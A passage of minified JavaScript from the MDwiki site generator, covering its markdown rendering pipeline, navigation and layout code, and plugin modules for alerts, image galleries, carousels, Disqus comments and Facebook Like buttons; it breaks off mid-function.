h="";"list_item_end"!==this.next().type;)h+="text"===this.token.type?this.parseText():this.tok();return"<li>"+h+"</li>\n";case"loose_item_start":for(var h="";"list_item_end"!==this.next().type;)h+=this.tok();return"<li>"+h+"</li>\n";case"html":return this.token.pre||this.options.pedantic?this.token.text:this.inline.output(this.token.text);case"paragraph":return"<p>"+this.inline.output(this.token.text)+"</p>\n";case"text":return"<p>"+this.parseText()+"</p>\n"}},f.exec=f,h.options=h.setOptions=function(a){return g(h.defaults,a),h},h.defaults={gfm:!0,tables:!0,breaks:!1,pedantic:!1,sanitize:!1,smartLists:!1,silent:!1,highlight:null,langPrefix:"lang-"},h.Parser=c,h.parser=c.parse,h.Lexer=a,h.lexer=a.lex,h.InlineLexer=b,h.inlineLexer=b.output,h.parse=h,"object"==typeof exports?module.exports=h:"function"==typeof define&&define.amd?define(function(){return h}):this.marked=h}).call(function(){return this||("undefined"!=typeof window?window:global)}()),function(a){"use strict";a("html").addClass("md-hidden-load"),a.md=function(b){return a.md.publicMethods[b]?a.md.publicMethods[b].apply(this,Array.prototype.slice.call(arguments,1)):void a.error("Method "+b+" does not exist on jquery.md")},a.md.config={title:null,useSideMenu:!0,lineBreaks:"gfm",additionalFooterText:"",anchorCharacter:"&para;",tocAnchor:"[ &uarr; ]"},a.md.gimmicks=[],a.md.stages=[],a.md.mainHref="",a.md.inPageAnchor="",a.md.loglevel={TRACE:10,DEBUG:20,INFO:30,WARN:40,ERROR:50,FATAL:60},a.md.logThreshold=a.md.loglevel.WARN}(jQuery),function(a){"use strict";a.md.getLogger=function(){var b=a.md.loglevel,c=function(c){var d=b[c];return function(b){a.md.logThreshold<=d&&console.log("["+c+"] "+b)}},d={};return d.trace=c("TRACE"),d.debug=c("DEBUG"),d.info=c("INFO"),d.warn=c("WARN"),d.error=c("ERROR"),d.fatal=c("FATAL"),d}}(jQuery),function(a){"use strict";var b=a.md.getLogger();a.Stage=function(c){var d=a.extend(a.Deferred(),{});return d.name=c,d.events=[],d.started=!1,d.reset=function(){d.complete=a.Deferred(),d.outstanding=[]},d.reset(),d.subscribe=function(b){d.started&&a.error("Subscribing to stage which already started!"),d.events.push(b)},d.unsubscribe=function(a){d.events.remove(a)},d.executeSubscribedFn=function(e){var f=a.Deferred();d.outstanding.push(f),a.md.util.wait(2500).done(function(){"resolved"!==f.state()&&(b.fatal("Timeout reached for done callback in stage: "+d.name+". Did you forget a done() call in a .subscribe() ?"),b.fatal("stage "+c+" failed running subscribed function: "+e))});var g=function(){f.resolve()};e(g)},d.run=function(){d.started=!0,a(d.events).each(function(a,b){d.executeSubscribedFn(b)}),0===d.outstanding.length&&d.resolve(),a.when.apply(a,d.outstanding).done(function(){d.resolve()}).fail(function(){d.resolve()})},d.done(function(){b.debug("stage "+d.name+" completed successfully.")}),d.fail(function(){b.debug("stage "+d.name+" completed with errors!")}),d}}(jQuery),function(a){"use strict";function b(){a.md.stages=[a.Stage("init"),a.Stage("load"),a.Stage("transform"),a.Stage("ready"),a.Stage("skel_ready"),a.Stage("bootstrap"),a.Stage("pregimmick"),a.Stage("gimmick"),a.Stage("postgimmick"),a.Stage("all_ready"),a.Stage("final_tests")],a.md.stage=function(b){var c=a.grep(a.md.stages,function(a){return a.name===b});return 0!==c.length?c[0]:void a.error("A stage by name "+b+"  does not exist")}}function c(){var b=a.md.stages;a.md.stages=[],a(b).each(function(b,c){a.md.stages.push(a.Stage(c.name))})}function d(b){var c={gfm:!0,tables:!0,breaks:!0};"original"===a.md.config.lineBreaks?c.breaks=!1:"gfm"===a.md.config.lineBreaks&&(c.breaks=!0),marked.setOptions(c);var d=marked(b);return d}function e(){var b="";a.md.stage("init").subscribe(function(c){var d={url:a.md.mainHref,dataType:"text"};a.ajax(d).done(function(a){b=a,c()}).fail(function(){var b=a.md.getLogger();b.fatal("Could not get "+a.md.mainHref),c()})}),a.md.stage("transform").subscribe(function(b){var c=a.md.mainHref.lastIndexOf("/"),d=a.md.mainHref.substring(0,c+1);a.md.baseUrl=d,b()}),a.md.stage("transform").subscribe(function(c){var e=d(b);a("#md-content").html(e),b="";var g=a.Deferred();f(g),g.always(function(){c()})})}function f(b){function c(){return a("a").filter(function(){var b=a(this).attr("href"),c=a(this).toptext(),d=a.md.util.hasMarkdownFileExtension(b),e="include"===c,f=c.startsWith("preview:");return(e||f)&&d})}function e(b,c){function d(a){return 3===a.nodeType}var e=0,f=[];return b.each(function(a,b){c>e&&(f.push(b),d(b)||e++)}),a(f)}var f=c(),g=a.md.util.countDownLatch(f.length);g.always(function(){b.resolve()}),f.each(function(b,c){var f=a(c),h=f.attr("href"),i=f.toptext();a.ajax({url:h,dataType:"text"}).done(function(b){var c=a(d(b));if(i.startsWith("preview:")){var g=parseInt(i.substring(8),10)||3,j=e(c,g);j.last().append('<a href="'+h+'"> ...read more &#10140;</a>'),j.insertBefore(f.parent("p").eq(0)),f.remove()}else c.insertAfter(f.parents("p")),f.remove()}).always(function(){g.countDown()})})}function g(a){return a?a.lastIndexOf("data:")>=0?!0:a.startsWith("mailto:")?!0:a.startsWith("file:")?!0:a.startsWith("ftp:")?!0:void 0:!1}function h(b,c){var d=a(b);void 0===c&&(c=""),d.find("a").not("#md-menu a").filter(function(){var b=a(this),c=b.attr("href");c&&0!==c.length||b.removeAttr("href")}),d.find("a, img").each(function(b,d){function e(b){return a.md.util.hasMarkdownFileExtension(b)?"#!"+b:b}var f=a(d),h=!1,i="href";f.attr(i)||(h=!0,i="src");var j=f.attr(i);if(!(j&&j.lastIndexOf("#!")>=0||g(j)||(h||!j.startsWith("#")||j.startsWith("#!")||f.click(function(b){b.preventDefault(),a.md.scrollToInPageAnchor(j)}),!a.md.util.isRelativeUrl(j)||h&&!a.md.util.isRelativePath(j)||!h&&a.md.util.isGimmickLink(f)))){var k=c+j;h?f.attr(i,k):a.md.util.isRelativePath(j)?f.attr(i,e(k)):f.attr(i,e(j))}})}function i(){a.md.stage("init").subscribe(function(b){a.md.NavigationDfd.done(function(){b()}).fail(function(){b()})}),a.md.stage("transform").subscribe(function(b){if(""===r){var c=a.md.getLogger();return c.info("no navgiation.md found, not using a navbar"),void b()}var d=marked(r),e=a("<div>"+d+"</div>");e.each(function(b,c){"SCRIPT"===c.tagName&&a("script").first().before(c)});var f=e.eq(0);f.find("p").each(function(b,c){var d=a(c);d.replaceWith(d.html())}),a("#md-menu").append(f.html()),b()}),a.md.stage("bootstrap").subscribe(function(b){h(a("#md-menu")),b()}),a.md.stage("postgimmick").subscribe(function(b){var c=a("#md-menu a").length,d=a("#md-menu .navbar-brand").eq(0).toptext().trim().length>0;!d&&1>=c&&a("#md-menu").hide(),b()})}function j(){a.md.stage("init").subscribe(function(b){a.md.ConfigDfd.done(function(){b()}).fail(function(){var c=a.md.getLogger();c.info("No config.json found, using default settings"),b()})})}function k(){a.md.stage("init").subscribe(function(b){a("#md-all").empty();var c='<div id="md-body"><div id="md-title"></div><div id="md-menu"></div><div id="md-content"></div></div>';a("#md-all").prepend(a(c)),b()})}function l(b){a.md.mainHref=b,e(),k(),a.md.stage("ready").subscribe(function(b){a.md.initializeGimmicks(),a.md.registerLinkGimmicks(),b()}),a.each(a.md.gimmicks,function(b,c){void 0!==c.load&&a.md.stage("load").subscribe(function(a){c.load(),a()})}),a.md.stage("ready").subscribe(function(b){a.md("createBasicSkeleton"),b()}),a.md.stage("bootstrap").subscribe(function(b){a.mdbootstrap("bootstrapify"),h(a("#md-content"),a.md.baseUrl),b()}),m()}function m(){a.md.stage("init").done(function(){a.md.stage("load").run()}),a.md.stage("load").done(function(){a.md.stage("transform").run()}),a.md.stage("transform").done(function(){a.md.stage("ready").run()}),a.md.stage("ready").done(function(){a.md.stage("skel_ready").run()}),a.md.stage("skel_ready").done(function(){a.md.stage("bootstrap").run()}),a.md.stage("bootstrap").done(function(){a.md.stage("pregimmick").run()}),a.md.stage("pregimmick").done(function(){a.md.stage("gimmick").run()}),a.md.stage("gimmick").done(function(){a.md.stage("postgimmick").run()}),a.md.stage("postgimmick").done(function(){a.md.stage("all_ready").run()}),a.md.stage("all_ready").done(function(){a("html").removeClass("md-hidden-load"),"function"==typeof window.callPhantom&&window.callPhantom({}),a.md.stage("final_tests").run()}),a.md.stage("final_tests").done(function(){c(),a("body").append('<span id="start-tests"></span>'),a("#start-tests").hide()}),a.md.stage("init").run()}function n(){var b;b=window.location.hash.substring(window.location.hash.startsWith("#!")?2:1),b=decodeURIComponent(b);var c=b.indexOf("#");-1!==c?(a.md.inPageAnchor=b.substring(c+1),a.md.mainHref=b.substring(0,c)):a.md.mainHref=b}function o(){var a="",b=window.location.hash||"";""===b||"#"===b||"#!"===b?a="#!index.md":b.startsWith("#!")&&b.endsWith("/")&&(a=b+"index.md"),a&&(window.location.hash=a)}var p=a.md.getLogger();b();var q={};a.md.publicMethods=a.extend({},a.md.publicMethods,q);var r="";a.md.NavigationDfd=a.Deferred();var s={url:"navigation.md",dataType:"text"};a.ajax(s).done(function(b){r=b,a.md.NavigationDfd.resolve()}).fail(function(){a.md.NavigationDfd.reject()}),a.md.ConfigDfd=a.Deferred(),a.ajax({url:"config.json",dataType:"text"}).done(function(b){try{var c=JSON.parse(b);a.md.config=a.extend(a.md.config,c),p.info("Found a valid config.json file, using configuration")}catch(d){p.error("config.json was not JSON parsable: "+d)}a.md.ConfigDfd.resolve()}).fail(function(b,c){p.error("unable to retrieve config.json: "+c),a.md.ConfigDfd.reject()}),a(document).ready(function(){j(),i(),n(),o(),a(window).bind("hashchange",function(){window.location.reload(!1)}),l(a.md.mainHref)})}(jQuery),function(a){var b={isRelativeUrl:function(a){return void 0===a?!1:-1===a.indexOf("://")?!0:!1},isRelativePath:function(a){return void 0===a?!1:a.startsWith("/")?!1:!0},isGimmickLink:function(a){return-1!==a.toptext().indexOf("gimmick:")?!0:!1},hasMarkdownFileExtension:function(b){var c=[".md",".markdown",".mdown"],d=!1,e=b.toLowerCase().split("#")[0];return a(c).each(function(a,b){e.toLowerCase().endsWith(b)&&(d=!0)}),d},wait:function(b){return a.Deferred(function(a){setTimeout(a.resolve,b)})}};a.md.util=a.extend({},a.md.util,b),"function"!=typeof String.prototype.startsWith&&(String.prototype.startsWith=function(a){return this.slice(0,a.length)===a}),"function"!=typeof String.prototype.endsWith&&(String.prototype.endsWith=function(a){return this.slice(this.length-a.length,this.length)===a}),a.fn.extend({toptext:function(){return this.clone().children().remove().end().text()}}),a.expr[":"].icontains=a.expr.createPseudo(function(b){return function(c){return a(c).toptext().toUpperCase().indexOf(b.toUpperCase())>=0}}),a.md.util.getInpageAnchorText=function(a){var b=a.replace(/ /g,"_");return b},a.md.util.getInpageAnchorHref=function(b,c){c=c||a.md.mainHref;var d=a.md.util.getInpageAnchorText(b);return"#!"+c+"#"+d},a.md.util.repeatUntil=function(b,c,d){function e(b,c,d){return 0===d?void f.reject():c()?void f.resolve():void a.md.util.wait(b).always(function(){e(b,c,d-1)})}d=d||10;var f=a.Deferred();return e(b,c,d),f},a.md.util.countDownLatch=function(b,c){c=c||0;var d=a.Deferred();return c>=b&&d.resolve(),d.capacity=b,d.countDown=function(){d.capacity--,d.capacity<=c&&d.resolve()},d}}(jQuery),function($){"use strict";function ScriptInfo(a){this.module=void 0,this.options={},this.src="",$.extend(this,a)}function LinkTrigger(a){this.trigger=void 0,this.module=void 0,this.callback=void 0,$.extend(this,a)}function insertInlineScript(a){var b=document.createElement("script");b.type="text/javascript",b.text=a,document.body.appendChild(b)}function checkLicense(a,b){if(-1===$.inArray(a,licenses)){var c=JSON.stringify(licenses);log.warn("license "+a+" is not known."),log.warn("Known licenses:"+c)}else"OTHER"===a&&log.warn("WARNING: Module "+b.name+" uses a script with unknown license. This may be a GPL license violation if this website is publically available!")}function loadScript(a){var b=a.module,c=a.src,d=a.options,e=d.license||"OTHER",f=d.loadstage||"skel_ready",g=d.finishstage||"pregimmick",h=d.callback,i=$.Deferred();checkLicense(e,b),log.debug("subscribing "+b.name+" to start: "+f+" end in: "+g),$.md.stage(f).subscribe(function(a){c.startsWith("//")||c.startsWith("http")?$.getScript(c,function(){void 0!==h?h(a):(log.debug("module"+b.name+" script load done: "+c),a()),i.resolve()}):(insertInlineScript(c),log.debug("module"+b.name+" script inject done"),i.resolve(),a())}),$.md.stage(g).subscribe(function(a){i.done(function(){a()})})}function findActiveLinkTrigger(){var a=$("a:icontains(gimmick:)");a.each(function(a,b){var c=getGimmickLinkParts($(b));-1===activeLinkTriggers.indexOf(c.trigger)&&activeLinkTriggers.push(c.trigger)}),log.debug("Scanning for required gimmick links: "+JSON.stringify(activeLinkTriggers))}function loadRequiredScripts(){$.each(activeLinkTriggers,function(a,b){var c=findModuleByTrigger(b);if(void 0===c)return void log.error('Gimmick link: "'+b+'" found but no suitable gimmick loaded');var d=registeredScripts.filter(function(a){return a.module.name===c.name})[0];void 0!==d&&loadScript(d)})}function findModuleByTrigger(a){var b;return $.each(linkTriggers,function(c,d){d.trigger===a&&(b=d.module)}),b}function getGimmickLinkParts($link){var link_text=$.trim($link.toptext());if(null===link_text.match(/gimmick:/i))return null;var href=$.trim($link.attr("href")),r=new RegExp(/gimmick:\s*([^(\s]*)\s*(\(\s*{?(.*)\s*}?\s*\))*/i),matches=r.exec(link_text);if(null===matches||void 0===matches[1])return $.error("Error matching a gimmick: "+link_text),null;var trigger=matches[1].toLowerCase(),args=null;if(void 0!==matches[2]){var params=$.trim(matches[3].toString());"}"===params.charAt(params.length-1)&&(params=params.substring(0,params.length-1)),params="({"+params+"})",params=params.replace(/'/g,'"');try{args=eval(params)}catch(err){log.error("error parsing argument of gimmick: "+link_text+"giving error: "+err)}}return{trigger:trigger,options:args,href:href}}function runGimmicksOnce(){$.each($.md.gimmicks,function(a,b){void 0!==b.once&&b.once()})}function subscribeLinkTrigger(a,b,c){log.debug("Subscribing gimmick "+c.module.name+" to stage: "+c.stage),$.md.stage(c.stage).subscribe(function(d){b.options=b.options||{},jQuery.contains(document.documentElement,a[0])||(log.error("LINK IS NOT IN THE DOM ANYMORE: "),console.log(a)),log.debug("Running gimmick "+c.module.name),c.callback(a,b.options,b.href,d),d()})}$.md.registerGimmick=function(a){$.md.gimmicks.push(a)},$.md.registerScript=function(a,b,c){var d=new ScriptInfo({module:a,src:b,options:c});registeredScripts.push(d)},$.md.registerCss=function(a,b,c){var d=c.license,e=c.stage||"skel_ready",f=c.callback;checkLicense(d,a);var g='<link rel="stylesheet" href="'+b+'" type="text/css"></link>';$.md.stage(e).subscribe(function(a){$("head").append(g),void 0!==f?f(a):a()})},$.md.prepareLink=function(a,b){b=b||{};var c=window.location.protocol;return b.forceSSL?"https://"+a:b.forceHTTP?"http://"+a:"file:"===c?"http://"+a:"//"+a},$.md.linkGimmick=function(a,b,c,d){void 0===d&&(d="gimmick");var e=new LinkTrigger({trigger:b,module:a,stage:d,callback:c});linkTriggers.push(e)},$.md.triggerIsActive=function(a){return-1===activeLinkTriggers.indexOf(a)?!1:!0};var initialized=!1;$.md.initializeGimmicks=function(){findActiveLinkTrigger(),runGimmicksOnce(),loadRequiredScripts()};var log=$.md.getLogger(),activeLinkTriggers=[],registeredScripts=[],linkTriggers=[],licenses=["MIT","BSD","GPL","GPL2","GPL3","LGPL","LGPL2","APACHE2","PUBLICDOMAIN","EXCEPTION","OTHER"];$.md.registerLinkGimmicks=function(){var a=$("a:icontains(gimmick:)");a.each(function(a,b){var c=$(b),d=getGimmickLinkParts(c);$.each(linkTriggers,function(a,b){d.trigger===b.trigger&&subscribeLinkTrigger(c,d,b)})})}}(jQuery),function(a){function b(){var b;if(a.md.config.title&&a("title").text(a.md.config.title),b=a("#md-content h1").eq(0),a.trim(b.toptext()).length>0){a("#md-title").prepend(b);{b.toptext()}}else a("#md-title").remove()}function c(){a("#md-content p").each(function(){var b=a(this);if(0!==a.trim(b.text()).length){var c=b.contents().filter(function(){var b=a(this);return"A"===this.tagName&&b.find("img").length>0?!0:"IMG"===this.tagName?!0:!1}),d=e(b);b.wrapInner('<div class="md-text" />'),0!==c.length&&(c.prependTo(b),b.addClass("md-floatenv").addClass(d))}})}function d(){a(".md-floatenv").find(".md-text").each(function(){var b=a(this).find("*").eq(0);b.is("br")&&b.remove()}),a(".md-image-group").find("br").remove()}function e(b){var c=a(b),d="",e=c.contents().filter(function(){return"IMG"===this.tagName||"IFRAME"===this.tagName?!0:"A"===this.tagName?a(this).find("img").length>0:a.trim(a(this).text()).length>0}),f=e[0];return void 0!==f&&null!==f&&(d="IMG"===f.tagName||"IFRAME"===f.tagName?"md-float-left":"A"===f.tagName&&a(f).find("img").length>0?"md-float-left":"md-float-right"),d}function f(){var b=a("p img").parents("p");b.addClass("md-image-group")}function g(){function b(){return c=a("img").filter(function(){var b=a(this).parents("a").eq(0);if(0===b.length)return!0;var c=b.attr("href");return c&&0===c.length})}var c=b();return c.each(function(){var b=a(this),c=b.attr("src"),d=b.attr("title");void 0===d&&(d=""),b.wrap('<a class="md-image-selfref" href="'+c+'" title="'+d+'"/> ')})}function h(){function b(b,c){var d=a.md.config.anchorCharacter,e=a('<span class="anchor-highlight"><a>'+d+"</a></span>");e.find("a").attr("href",c),e.hide();var f=!1;b.mouseenter(function(){f=!0,a.md.util.wait(300).then(function(){f&&e.fadeIn(200)})}),b.mouseleave(function(){f=!1,e.fadeOut(200)}),e.appendTo(b)}function c(b){if(a.md.config.useSideMenu!==!1&&"H2"===b.prop("tagName")){var c=a.md.config.tocAnchor;if(""!==c){var d=a('<a class="visible-xs visible-sm jumplink" href="#md-page-menu">'+c+"</a>");d.click(function(b){b.preventDefault(),a("body").scrollTop(a("#md-page-menu").position().top)}),0===b.parents("#md-menu").length&&d.insertAfter(b)}}}a("h1,h2,h3,h4,h5,h6").not("#md-title h1").each(function(){var d=a(this);d.addClass("md-inpage-anchor");var e=d.clone().children(".anchor-highlight").remove().end().text(),f=a.md.util.getInpageAnchorHref(e);b(d,f),c(d)})}var i={createBasicSkeleton:function(){b(),c(),g(),f(),d(),h(),a.md.stage("all_ready").subscribe(function(b){""!==a.md.inPageAnchor&&a.md.util.wait(500).then(function(){a.md.scrollToInPageAnchor(a.md.inPageAnchor)}),b()})}};a.md.publicMethods=a.extend({},a.md.publicMethods,i),a.md.scrollToInPageAnchor=function(b){b.startsWith("#")&&(b=b.substring(1,b.length));var c=!1;a(".md-inpage-anchor").each(function(){if(!c){var d=a(this),e=d.toptext(),f=a.md.util.getInpageAnchorText(e);if(b===f){this.scrollIntoView(!0);var g=a(".navbar-collapse").height()+5;window.scrollBy(0,-g+5),c=!0}}})}}(jQuery),function(a){"use strict";function b(){if(!(a("#md-menu").length<=0)){o="top";var b=a("#md-menu").children(),c="";c+='<div id="md-main-navbar" class="navbar navbar-default navbar-fixed-top" role="navigation">',c+='<div class="navbar-header">',c+='<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">',c+='<span class="sr-only">Toggle navigation</span>',c+='<span class="icon-bar"></span>',c+='<span class="icon-bar"></span>',c+='<span class="icon-bar"></span>',c+="</button>",c+='<a class="navbar-brand" href="#"></a>',c+="</div>",c+='<div class="collapse navbar-collapse navbar-ex1-collapse">',c+='<ul class="nav navbar-nav" />',c+='<ul class="nav navbar-nav navbar-right" />',c+="</div>",c+="</div>";var e=a(c);e.appendTo("#md-menu"),a("#md-menu ul.nav").eq(0).append(b),a("#md-menu").prependTo("#md-all");var f=a("#md-menu h1").toptext();a("#md-menu h1").remove(),a("a.navbar-brand").text(f),a("#md-body").css("margin-top","70px"),a.md.stage("pregimmick").subscribe(function(a){d(),a()})}}function c(){var b=a("#md-main-navbar").height()+10;a("#md-body").css("margin-top",b+"px")}function d(){var b=0,d=a.md.util.repeatUntil(40,function(){return b=a("#md-main-navbar").height(),b>35&&481>b},25);d.done(function(){b=a("#md-main-navbar").height(),c();var d=a.md.util.repeatUntil(20,function(){return b!==a("#md-main-navbar").height()
-},25);d.done(function(){c()}),a.md.util.wait(2e3).done(function(){c()})})}function e(){if(0!==a("#md-menu a").length){var c=a("#md-menu");c.find('> a[href=""]').attr("data-toggle","dropdown").addClass("dropdown-toggle").attr("href","").append('<b class="caret"/>'),c.find("ul").addClass("dropdown-menu"),c.find("ul li").addClass("dropdown"),a("#md-menu hr").each(function(b,c){var d=a(c),e=d.prev(),f=d.next();e.is("ul")&&e.length>=0&&(e.append(a('<li class="divider"/>')),d.remove(),f.is("ul")&&(f.find("li").appendTo(e),f.remove()))}),a("#md-menu ul").each(function(b,c){var d=a(c);0===d.find("li").length&&d.remove()}),a("#md-menu hr").replaceWith(a('<li class="divider-vertical"/>')),a("#md-menu > a").wrap("<li />"),a("#md-menu ul").each(function(b,c){var d=a(c);d.appendTo(d.prev()),d.parent("li").addClass("dropdown")}),a("#md-menu li.dropdown").find("h1, h2, h3").each(function(b,c){var d=a(c),e=d.toptext(),f=a('<li class="dropdown-header" />');f.text(e),d.replaceWith(f)}),b()}}function f(b){var c=a(b),d=a(window).scrollTop(),e=d+a(window).height(),f=c.offset().top,g=f+c.height();return e>=g&&f>=d}function g(){var b=a("#md-content").find("h2").clone();if(b.children().remove(),!(b.length<=1)){a("#md-content").removeClass("col-md-12"),a("#md-content").addClass("col-md-9"),a("#md-content-row").prepend('<div class="col-md-3" id="md-left-column"/>');var c=function(){var b=a("#md-left-column").css("width");a("#md-page-menu").css("width",b)};a(window).scroll(function(){c(a("#md-page-menu"));var b;a("*.md-inpage-anchor").each(function(c,d){if(void 0===b){var e=a(d);f(e)&&(b=e)}}),a("#md-page-menu a").each(function(c,d){var e=a(d);b&&e.toptext()===b.toptext()&&(a("#md-page-menu a.active").removeClass("active"),e.addClass("active"))})});var e=a('<div id="md-page-menu" />'),g=70;e.affix({offset:130}),e.css("top",g);var h=a('<div class="panel panel-default"><ul class="list-group"/></div>'),i=h.find("ul");e.append(h),b.each(function(b,c){var d=a(c),e=a('<li class="list-group-item" />'),f=a("<a />");f.attr("href",a.md.util.getInpageAnchorHref(d.toptext())),f.click(function(b){b.preventDefault();var c=a(this),d=a.md.util.getInpageAnchorText(c.toptext());a.md.scrollToInPageAnchor(d)}),f.text(d.toptext()),e.append(f),i.append(e)}),a(window).resize(function(){c(a("#md-page-menu")),d()}),a.md.stage("postgimmick").subscribe(function(a){a()}),a("#md-left-column").append(e)}}function h(){a("#md-title").wrap('<div class="container" id="md-title-container"/>'),a("#md-title").wrap('<div class="row" id="md-title-row"/>'),a("#md-menu").wrap('<div class="container" id="md-menu-container"/>'),a("#md-menu").wrap('<div class="row" id="md-menu-row"/>'),a("#md-content").wrap('<div class="container" id="md-content-container"/>'),a("#md-content").wrap('<div class="row" id="md-content-row"/>'),a("#md-body").wrap('<div class="container" id="md-body-container"/>'),a("#md-body").wrap('<div class="row" id="md-body-row"/>'),a("#md-title").addClass("col-md-12"),a("#md-content").addClass("col-md-12")}function i(){var b=a('<div class="page-header" />');a("#md-title").wrapInner(b)}function j(){if(0!==a("#md-menu").find("li").length){var b=window.location.hash;0===b.length&&(b="#!index.md");var c='li:has(a[href="'+b+'"])';a("#md-menu").find(c).addClass("active")}}function k(){var b=a("p img").parents("p");b.each(function(){function b(b,c){return d.each(function(b,d){var e=a(d),f=e.parent("a");f.length>0?f.wrap(c):e.wrap(c)})}var c=a(this),d=a(this).find("img").filter(function(){return 0===a(this).parents("a").length}).add(a(this).find("img")).addClass("img-responsive").addClass("img-thumbnail");c.hasClass("md-floatenv")?1===d.length?b(d,'<div class="col-sm-8" />'):2===d.length?b(d,'<div class="col-sm-4" />'):b(d,'<div class="col-sm-2" />'):1===d.length?b(d,'<div class="col-sm-12" />'):2===d.length?b(d,'<div class="col-sm-6" />'):3===d.length?b(d,'<div class="col-sm-4" />'):4===d.length?b(d,'<div class="col-sm-3" />'):b(d,'<div class="col-sm-2" />'),c.addClass("row")})}function l(){a("iframe.md-external").not(".md-external-nowidth").attr("width","450").css("width","450px"),a("iframe.md-external").not(".md-external-noheight").attr("height","280").css("height","280px"),a("div.md-external").not(".md-external-noheight").css("height","280px"),a("div.md-external").not(".md-external-nowidth").css("width","450px")}function m(){var b="";b+='<hr><div class="scontainer">',b+='<div class="pull-right md-copyright-footer"> ',b+='<span id="md-footer-additional"></span>',b+='Website generated with <a href="http://www.mdwiki.info">MDwiki</a> ',b+="&copy; Timo D&ouml;rr and contributors. ",b+="</div>",b+="</div>";var c=a(b);c.css("position","relative"),c.css("margin-top","1em"),a("#md-all").append(c)}function n(){var b=a.md.config.additionalFooterText;b&&a(".md-copyright-footer #md-footer-additional").html(b)}a.mdbootstrap=function(b){return a.mdbootstrap.publicMethods[b]?a.mdbootstrap.publicMethods[b].apply(this,Array.prototype.slice.call(arguments,1)):void a.error("Method "+b+" does not exist on jquery.mdbootstrap")},a.mdbootstrap.events=[],a.mdbootstrap.bind=function(b,c){a(document).bind(b,c),a.mdbootstrap.events.push(b)},a.mdbootstrap.trigger=function(b){a(document).trigger(b)};var o="",p={bootstrapify:function(){h(),e(),i(),k(),a("table").addClass("table").addClass("table-bordered"),a.md.stage("pregimmick").subscribe(function(b){a.md.config.useSideMenu!==!1&&g(),m(),n(),b()}),a.md.stage("postgimmick").subscribe(function(a){l(),j(),a()})}};a.mdbootstrap.publicMethods=a.extend({},a.mdbootstrap.publicMethods,p)}(jQuery),function(a){a.gimmicks=a.fn.gimmicks=function(b){return void 0!==b?a.fn.gimmicks.methods[b]?a.fn.gimmicks.methods[b].apply(this,Array.prototype.slice.call(arguments,1)):void a.error("Gimmick "+b+" does not exist on jQuery.gimmicks"):void 0}}(jQuery),function(a){function b(){var b=a(c());b.each(function(){var b=a(this.p),c=this.alertType;b.addClass("alert"),"note"===c?b.addClass("alert-info"):"hint"===c?b.addClass("alert-success"):"warning"===c&&b.addClass("alert-warning")})}function c(){var b=["note","beachte"],c=["achtung","attention","warnung","warning","atención","guarda","advertimiento"],d=["hint","tipp","tip","hinweis"],e=b.concat(c);e=e.concat(d);var f=[];return a("p").filter(function(){var g=a(this);a(e).each(function(e,h){var i=g.text().toLowerCase(),j=new RegExp(h+"(:|!)+.*","i"),k="none";null!==i.match(j)&&(a.inArray(h,b)>=0?k="note":a.inArray(h,c)>=0?k="warning":a.inArray(h,d)>=0&&(k="hint"),f.push({p:g,alertType:k}))})}),f}var d={name:"alerts",load:function(){a.md.stage("bootstrap").subscribe(function(a){b(),a()})}};a.md.registerGimmick(d)}(jQuery),function(a){var b={name:"colorbox",load:function(){a.md.stage("gimmick").subscribe(function(b){a.gimmicks("colorbox"),b()})}};a.md.registerGimmick(b);var c={colorbox:function(){var b;b=a(this instanceof jQuery?this:".md-image-group");var c=0;return b.each(function(){var b=a(this),d="gallery-group-"+c++;b.find("a.md-image-selfref img").parents("a").colorbox({rel:d,opacity:.75,slideshow:!0,maxWidth:"95%",maxHeight:"95%",scalePhotos:!0,photo:!0,slideshowAuto:!1})})}};a.gimmicks.methods=a.extend({},a.fn.gimmicks.methods,c)}(jQuery),function(a){"use strict";function b(b,c,d){var e=a('<div id="myCarousel" class="carousel slide"></div>'),f=a('<div class="carousel-inner"/>');e.append('<ol class="carousel-indicators" />');var g=[];a.each(d.split(","),function(b,c){g.push(a.trim(c)),e.find("ol").append('<li data-target="#myCarousel" data-slide-to="'+b+'" class="active" /');var d;d=0===b?'<div class="active item"/>':'<div class="item"/>',f.append(a(d).append('<img src="'+c+'"/>'))}),e.append(f),e.append('<a class="carousel-control left" href="#myCarousel" data-slide="prev">&lsaquo;</a>'),e.append('<a class="carousel-control right" href="#myCarousel" data-slide="next">&rsaquo;</a>'),b.replaceWith(e)}var c={name:"Themes",version:a.md.version,once:function(){a.md.linkGimmick(this,"carousel",b)}};a.md.registerGimmick(c)}(jQuery),function(a){var b={name:"disqus",version:a.md.version,once:function(){a.md.linkGimmick(this,"disqus",d)}};a.md.registerGimmick(b);var c=!1,d=function(b,d){var e={identifier:""},f=a.extend(e,d),g=a('<div id="disqus_thread" class="md-external md-external-noheight md-external-nowidth" ><a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></div>');return g.css("margin-top","2em"),b.each(function(b,d){if(c!==!0){c=!0;var e=a(d),h=e.attr("href");void 0!==h&&h.length>0&&(e.remove(),a("#md-content").append(g),a("#disqus_thread").length>0&&!function(){var a,b=window.location.href;a=f.identifier.length>0?f.identifier:b;var c=document.createElement("script");c.type="text/javascript",c.async=!0,c.src="http://"+h+".disqus.com/embed.js",(document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]).appendChild(c)}())}})}}(jQuery),function(a){function b(b,c){var d={layout:"standard",showfaces:!0},f=a.extend({},d,c);return"boxcount"===f.layout&&(f.layout="box_count"),"buttoncount"===f.layout&&(f.layout="button_count"),b.each(function(b,c){var d=a(c),g=d.attr("href");a("body").append(e);var h=a('<div class="fb-like" data-send="false" data-width="450"></div>');h.attr("data-href",g),h.attr("data-layout",f.layout),h.attr("data-show-faces",f.showfaces),d.replaceWith(h)})}var c=window.navigator.userLanguage||window.navigator.language,d=c+"_"+c.toUpperCase(),e=a('<div id="fb-root" />'),f=a.md.prepareLink("connect.facebook.net/"+d+"/all.js#xfbml=1",{forceHTTP:!0}),g='(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "'+f+'"; fjs.parentNode.insertBefore(js, fjs);}(document, "script", "facebook-jssdk"));',h={name:"FacebookLike",version:a.md.version,once:function(){a.md.linkGimmick(this,"facebooklike",b),a.md.registerScript(this,g,{license:"APACHE2",loadstage:"postgimmick",finishstage:"all_ready"})}};a.md.registerGimmick(h)}(jQuery),function(a){"use strict";function b(b,c){return b.each(function(b,d){var 